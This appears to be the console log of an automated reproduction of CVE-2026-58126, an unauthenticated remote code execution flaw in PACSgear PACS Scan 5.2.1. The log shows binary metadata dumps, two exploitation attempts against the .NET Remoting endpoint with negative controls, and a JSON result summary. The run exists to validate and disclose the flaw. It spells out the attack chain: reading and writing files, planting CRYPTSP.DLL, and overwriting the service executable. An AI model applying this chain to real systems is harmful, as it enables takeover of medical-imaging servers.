================================================================ CVE-2026-58126: PACSgear PACS Scan 5.2.1 unauthenticated RCE ================================================================ This script uses the original vendor PACS Scan 5.2.1 package and real PGImageExchQueue.exe remoting endpoint. It exploits the disclosed .NET Remoting MBRO/WebClient primitive with no credentials to read and write files, plants CRYPTSP.DLL, overwrites the service executable via the same remote file-write primitive, and starts the product service path to execute attacker-controlled code. [+] Reusing Wine prefix with .NET 4.0: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/wineprefix_dotnet40 [+] Reusing cached vendor installer: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/PacsSCAN5.2.1.zip zip_size=253553415 contains_msi=True [+] Reusing clean extracted vendor installation: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/PacsSCAN5.2.1.zip size=253553415 sha256=cbc8a2a9edac6214af1717991473324a792a24ff9501e57ab807ccb9da367156 /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract/Program Files/Pacsgear/Pacsgear Image Exchange Service/PGImageExchQueue.exe size=542176 sha256=853e7ea4ac56cc85df9a21a81c993a36ac3bff803e35b7ba3aa7c1438a28525c /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract/Program Files/Pacsgear/Pacsgear Image Exchange Service/PGImageExchangeQueueSvc.exe size=13296 sha256=95c8fcb4a934dd809951916e74872ccce0cb8e201f3ad0508542c316be3d1299 Static identity from original vendor binaries Installer URL: https://download.pacsgear.com/download/PacsSCAN5.2.1.zip Extracted product dir: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract/Program Files/Pacsgear/Pacsgear Image Exchange Service FILE /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract/Program Files/Pacsgear/Pacsgear Image Exchange Service/PGImageExchQueue.exe contains_TcpChannel=True contains_Remoting=True contains_RegisterWellKnownServiceType=True contains_PGImageExchange=False contains_PGImageExchangeQueueSvc=False FILE /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/artifacts/vendor_product/msi_extract/Program Files/Pacsgear/Pacsgear Image Exchange Service/PGImageExchangeQueueSvc.exe contains_TcpChannel=False contains_Remoting=False contains_RegisterWellKnownServiceType=False contains_PGImageExchange=True contains_PGImageExchangeQueueSvc=True 22: PGImageExchQueue.ExchangeFormUI (flist=216, mlist=72, flags=0x100001, extends=0x11) 23: PGImageExchQueue.IRemote (flist=256, mlist=93, flags=0xa1, extends=0x0) 24: PGImageExchQueue.CRemote (flist=256, mlist=107, flags=0x100001, extends=0x15) 29: PGImageExchQueue.ExchangeForm (flist=268, mlist=158, flags=0x100001, extends=0x11) 30: PGImageExchQueue.ExchangeForm/ExitHandler (flist=329, mlist=223, flags=0x102, extends=0xd) 31: PGImageExchQueue.ExchangeForm/ProgessHandler (flist=329, mlist=227, flags=0x103, extends=0xd) 32: PGImageExchQueue.ExchangeForm/CompletionHandler (flist=329, mlist=231, flags=0x103, extends=0xd) 33: PGImageExchQueue.ExchangeForm/Delegate_ImportHandler (flist=329, mlist=235, flags=0x103, extends=0xd) 34: PGImageExchQueue.ExchangeForm/Delegate_ShowInbox (flist=329, mlist=239, flags=0x103, extends=0xd) 35: PGImageExchQueue.ExchangeForm/Delegate_HideInbox (flist=329, mlist=243, flags=0x103, extends=0xd) 36: PGImageExchQueue.ExchangeForm/Delegate_StopDownload (flist=329, mlist=247, flags=0x103, extends=0xd) 37: PGImageExchQueue.ExchangeForm/Delegate_ConfigUpdate (flist=329, mlist=251, flags=0x103, extends=0xd) 38: PGImageExchQueue.ExchangeForm/Delegate_GetMessages (flist=329, mlist=255, flags=0x103, extends=0xd) 39: PGImageExchQueue.ExchangeForm/Delegate_GetThreads (flist=329, mlist=259, flags=0x103, extends=0xd) 40: PGImageExchQueue.ExchangeForm/Delegate_GetSendJobs (flist=329, mlist=263, flags=0x103, extends=0xd) 41: PGImageExchQueue.ExchangeForm/Delegate_GetLog (flist=329, mlist=267, flags=0x103, extends=0xd) 42: PGImageExchQueue.ExchangeForm/Delegate_RestartJob (flist=329, mlist=271, flags=0x103, extends=0xd) 43: PGImageExchQueue.ExchangeForm/Delegate_RestartJobs (flist=329, mlist=275, flags=0x103, extends=0xd) 44: PGImageExchQueue.ExchangeForm/Delegate_ClearJobs (flist=329, mlist=279, flags=0x103, extends=0xd) 45: PGImageExchQueue.ExchangeForm/Delegate_ClearJobs2 (flist=329, mlist=283, flags=0x103, extends=0xd) 52: PGImageExchQueue.Program (flist=365, mlist=300, flags=0x100180, extends=0x5) 57: PGImageExchQueue.ExchangeForm/<>c__DisplayClass2 (flist=413, mlist=360, flags=0x100103, extends=0x5) 58: PGImageExchQueue.ExchangeForm/<>c__DisplayClass6 (flist=414, mlist=362, flags=0x100103, extends=0x5) ########## PGImageExchQueue.IRemote 94: instance default string Ping () (param: 146 impl_flags: cil managed ) 97: instance default class [mscorlib]System.Collections.Generic.List`1 GetMessages () (param: 146 impl_flags: cil managed ) 98: instance default bool StopDownload (string msgID) (param: 146 impl_flags: cil managed ) 102: instance default string GetLog () (param: 148 impl_flags: cil managed ) 103: instance default bool RestartJob (string id) (param: 148 impl_flags: cil managed ) 104: instance default bool RestartJobs () (param: 149 impl_flags: cil managed ) 105: instance default bool ClearJobs (bool done, bool failed, bool cancelled) (param: 149 impl_flags: cil managed ) 106: instance default bool ClearJobs () (param: 152 impl_flags: cil managed ) ########## PGImageExchQueue.CRemote 108: instance default bool ClearJobs (bool done, bool failed, bool cancelled) (param: 152 impl_flags: cil managed ) 109: instance default bool ClearJobs () (param: 155 impl_flags: cil managed ) 110: instance default bool RestartJobs () (param: 155 impl_flags: cil managed ) 111: instance default bool RestartJob (string id) (param: 155 impl_flags: cil managed ) 113: instance default string GetLog () (param: 156 impl_flags: cil managed ) 116: instance default string Ping () (param: 156 impl_flags: cil managed ) 119: instance default class [mscorlib]System.Collections.Generic.List`1 GetMessages () (param: 156 impl_flags: cil managed ) 120: instance default bool StopDownload (string id) (param: 156 impl_flags: cil managed ) 148: instance default class [mscorlib]System.Collections.Generic.List`1 GetMessages () (param: 247 impl_flags: cil managed ) 149: instance default bool StopDownload (string msgID) (param: 247 impl_flags: cil managed ) 153: instance default string GetLog () (param: 249 impl_flags: cil managed ) 154: instance default bool RestartJob (string id) (param: 249 impl_flags: cil managed ) 155: instance default bool RestartJobs () (param: 250 impl_flags: cil managed ) 156: instance default bool ClearJobs (bool done, bool failed, bool cancelled) (param: 250 impl_flags: cil managed ) 157: instance default bool ClearJobs () (param: 253 impl_flags: cil managed ) 167: instance default bool StopDownload (string msgID) (param: 261 impl_flags: cil managed ) 169: instance default bool RestartJob (string id) (param: 262 impl_flags: cil managed ) 170: instance default bool ClearJobs (bool done, bool failed, bool cancelled) (param: 263 impl_flags: cil managed ) 171: instance default bool ClearJobs () (param: 266 impl_flags: cil managed ) 172: instance default bool RestartJobs () (param: 266 impl_flags: cil managed ) 173: instance default string GetLog () (param: 266 impl_flags: cil managed ) 175: instance default class [mscorlib]System.Collections.Generic.List`1 GetMessages () (param: 266 impl_flags: cil managed ) 181: instance default bool SetupRemote () (param: 273 impl_flags: cil managed ) ########## .Delegate_StopDownload ########## .Delegate_GetMessages ########## .Delegate_GetLog ########## .Delegate_RestartJob ########## .Delegate_RestartJobs ########## .Delegate_ClearJobs ########## .Delegate_ClearJobs2 ================================================================ [*] Attempt 1: negative control with original service binary ================================================================ [+] Negative control passed: original service startup did not create attacker marker ================================================================ [*] Attempt 1: starting real PGImageExchQueue.exe endpoint ================================================================ [+] Original PGImageExchQueue.exe is listening on TCP/22222 [+] Reading C:\Windows\win.ini and writing proof file through remote WebClient [+] Planting CRYPTSP.DLL in the product application directory through remote WebClient [+] Overwriting PGImageExchangeQueueSvc.exe through remote WebClient ================================================================ [*] Attempt 1: starting product service path after remote overwrite ================================================================ 00cc:err:environ:init_peb starting L"C:\\windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe" in experimental wow64 mode 00f8:err:ntoskrnl:ZwLoadDriver failed to create driver L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\winebth": c00000e5 0024:err:environ:init_peb starting L"Z:\\data\\pruva\\runs\\02ae215a-af03-454a-a465-5525d65e97e6\\bundle\\artifacts\\vendor_product\\msi_extract\\Program Files\\Pacsgear\\Pacsgear Image Exchange Service\\PGImageExchangeQueueSvc.exe" in experimental wow64 mode X connection to :99 broken (explicit kill or server shutdown). X connection to :99 broken (explicit kill or server shutdown). X connection to :99 broken (explicit kill or server shutdown). CVE-2026-58126 CODE EXECUTION: overwritten PGImageExchangeQueueSvc.exe executed [+] Attempt 1 succeeded: attacker-controlled code executed from product service path ================================================================ [*] Attempt 2: negative control with original service binary ================================================================ [+] Negative control passed: original service startup did not create attacker marker ================================================================ [*] Attempt 2: starting real PGImageExchQueue.exe endpoint ================================================================ [+] Original PGImageExchQueue.exe is listening on TCP/22222 [+] Reading C:\Windows\win.ini and writing proof file through remote WebClient [+] Planting CRYPTSP.DLL in the product application directory through remote WebClient [+] Overwriting PGImageExchangeQueueSvc.exe through remote WebClient ================================================================ [*] Attempt 2: starting product service path after remote overwrite ================================================================ 00cc:err:environ:init_peb starting L"C:\\windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe" in experimental wow64 mode 00f8:err:ntoskrnl:ZwLoadDriver failed to create driver L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\winebth": c00000e5 0024:err:environ:init_peb starting L"Z:\\data\\pruva\\runs\\02ae215a-af03-454a-a465-5525d65e97e6\\bundle\\artifacts\\vendor_product\\msi_extract\\Program Files\\Pacsgear\\Pacsgear Image Exchange Service\\PGImageExchangeQueueSvc.exe" in experimental wow64 mode X connection to :99 broken (explicit kill or server shutdown). CVE-2026-58126 CODE EXECUTION: overwritten PGImageExchangeQueueSvc.exe executed [+] Attempt 2 succeeded: attacker-controlled code executed from product service path ================================================================ RESULT ================================================================ vendor_binary_used=true service_started=true healthcheck_passed=true target_path_reached=true read_write_primitive=true code_execution=true { "entrypoint_kind": "api_remote", "entrypoint_detail": "Original Hyland/PACSgear PACS Scan 5.2.1 PGImageExchQueue.exe .NET Remoting TCP endpoint tcp://127.0.0.1:22222/PGImageExchange; vendor_binary_used=true", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "original PACS Scan 5.2.1 installer", "PGImageExchQueue.exe", "PGImageExchangeQueueSvc.exe path", "Windows .NET Framework 4 under Wine", "System.Runtime.Remoting TcpChannel", "MBRO Lazy WebClient exploit" ], "proof_artifacts": [ "logs/reproduction_steps.log", "logs/product_availability.log", "logs/product_static_identity.log", "logs/product_attempt_1_server.log", "logs/product_attempt_1_exploit.log", "logs/product_attempt_1_service.log", "logs/product_attempt_1_negative_service.log", "logs/product_attempt_2_server.log", "logs/product_attempt_2_exploit.log", "logs/product_attempt_2_service.log", "logs/product_attempt_2_negative_service.log", "logs/wine_dotnet_setup.log", "repro/artifacts/product_identity.json", "repro/artifacts/product_attempt_1/remote_read_win_ini.txt", "repro/artifacts/product_attempt_1/remote_write_proof.txt", "repro/artifacts/product_attempt_1/rce_marker.txt", "repro/artifacts/product_attempt_1/cryptsp_upload.txt", "repro/artifacts/product_attempt_1/service_overwrite_upload.txt", "repro/artifacts/product_attempt_2/remote_read_win_ini.txt", "repro/artifacts/product_attempt_2/remote_write_proof.txt", "repro/artifacts/product_attempt_2/rce_marker.txt", "repro/artifacts/product_attempt_2/cryptsp_upload.txt", "repro/artifacts/product_attempt_2/service_overwrite_upload.txt" ], "notes": "Original PACS Scan 5.2.1 PGImageExchQueue.exe was exploited twice over unauthenticated .NET Remoting. The server-side WebClient MBRO primitive read C:\\Windows\\win.ini, wrote proof files, planted CRYPTSP.DLL in the product directory, overwrote PGImageExchangeQueueSvc.exe via the remote file-write primitive, and code executed when the product service path was started. Negative controls with the clean service binary created no marker." }